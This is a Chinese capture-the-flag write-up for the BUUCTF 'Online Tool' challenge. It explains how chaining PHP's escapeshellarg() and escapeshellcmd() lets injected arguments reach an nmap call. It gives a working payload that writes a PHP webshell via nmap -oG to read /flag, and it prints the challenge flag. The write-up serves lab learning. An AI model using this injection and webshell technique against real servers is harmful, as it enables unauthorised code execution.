题目地址:
https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool
源码如下:
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}分析过程如下:
这里重点是escapeshellarg()+escapeshellcmd()两个函数的使用,导致闭合单引号后即可执行任意参数,可参考PHP escapeshellarg()+escapeshellcmd() 之殇语法使用。
传入的参数是:
172.17.0.2' -v -d a=1经过
escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。经过
escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:PHP: escapeshellcmd - Manual最后执行的命令是
curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为
curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'。
这道题和2020网鼎杯-朱雀组-nmap 较为相似,可以顺便做下理解其用法:
题目链接如下: BUUCTF在线评测
都是有escapeshellarg()+escapeshellcmd()两个函数的使用以及nmap命令使用。
这道题的话利用namp的-oG参数写入shell:
?host='<?php echo `cat /flag`;?>%20 -oG 1.php '注意的是 前后都需要用单引号闭合,并且最后面需要空一格,如果不加,当两个函数执行并输出来后就会变成:<?php eval($_POST["v"]);?> -oG shell.php\\,导致无法写入文件。

最后访问/f366abcf2c3a9477a6ff1262ad436ed8/1.php即可拿到flag:

flag{615b494f-8146-424f-a48d-6be6ada2c82e}